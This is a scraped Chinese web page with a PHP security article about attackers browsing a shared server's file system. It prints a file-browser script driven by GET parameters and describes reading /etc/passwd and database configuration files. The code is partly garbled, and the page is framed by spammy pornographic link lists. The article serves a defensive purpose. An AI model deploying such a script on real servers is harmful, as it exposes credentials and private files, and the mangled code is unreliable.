午夜剧场伦理_日本一道高清_国产又黄又硬_91黄色网战_女同久久另类69精品国产_妹妹的朋友在线

您的位置:首頁技術文章
文章詳情頁

PHP安全-文件系統瀏覽

瀏覽:137日期:2022-09-11 18:04:01
文件系統瀏覽

除了能在共享服務器上讀取任意文件之外,攻擊者還能建立一個可以瀏覽文件系統的腳本。由于你的大多數敏感文件不會保存在網站主目錄下,此類腳本一般用于找到你的源文件的所在位置。請看下例:

<pre>

<?php

if (isset($_GET[’dir’]))

{

ls($_GET[’dir’]);

}

elseif (isset($_GET[’file’]))

{

cat($_GET[’file’]);

}

else

{

ls(’/’);

}

function cat($file)

{

echo htmlentities(file_get_contents($file), ENT_QUOTES, ’UTF-8’));

}

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize('$dir$filename');

if (is_dir('$dir$filename'))

{

$type = ’dir’;

$filename .= ’/’;

}

else

{

$type = ’file’;

}

if (is_readable('$dir$filename'))

{

$line = str_pad($size, 15);

$line .= '<a href='http://www.leifengta.com.cn/bcjs/{$_SERVER[’PHP_SELF’]}';

$line .= '?$type=$dir$filename'>$filename</a>';

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

echo '$linen';

}

$handle->close();

}

?>

</pre>

攻擊者可能會首先察看/etc/passwd文件或/home目錄以取得該服務器上的用戶名清單;可以通過語言的結構如include或require來發現保存在網站主目錄以外的源文件所在位置。例如,考慮一下下面的腳本文件/home/victim/public_html/admin.php:

<?php

include ’../inc/db.inc’;

/* ... */

?>

如果攻擊者設法顯示了該文件的源碼,就可以發現db.inc的所在位置,同時他可以使用readfile()函數來使其內容暴露,取得了數據庫的訪問權限。這樣,在這個環境中保存db.inc于網站主目錄之外的做法并未起到保護作用。

這一攻擊說明了為什么要把共享服務器上的所有源文件看成是公開的,并要選擇數據庫實現所有敏感數據的保存。

標簽: PHP
相關文章:
主站蜘蛛池模板: 四虎成人永久免费视频 | 久久视频在线播放 | 日韩中文字幕亚洲 | 国产黄页| 拍国产真实乱人偷精品 | 五月激情婷婷丁香 | 日韩欧美高清在线 | 欧美性猛交ⅹ乱大交3 | www久久久久久 | 九九九在线 | 亚洲爱爱网站 | 黄色特一级片 | 免费视频久久 | 日韩视频a| 中文字幕网站在线观看 | 在线网站你懂的 | 日韩一区二区三区三四区视频在线观看 | v片在线观看 | www在线看 | 亚洲一区在线免费观看 | 亚洲高清视频在线观看 | 伊人青草| 玉足女爽爽91 | 中文字幕亚洲视频 | 欧美午夜精品久久久久久浪潮 | 日韩视频在线播放 | 午夜视频在线看 | 国产精品一区二区三区免费 | 插的太深了 | 国产第1页 | 麻豆亚洲一区 | 日本男人的天堂 | 精品国产一区二区三区在线观看 | 天堂社区av | 99这里只有 | 天天看天天摸天天操 | 日韩欧美一级视频 | 免费黄色一级视频 | 国产簧片 | 91av在线免费 | 最近日本中文字幕 |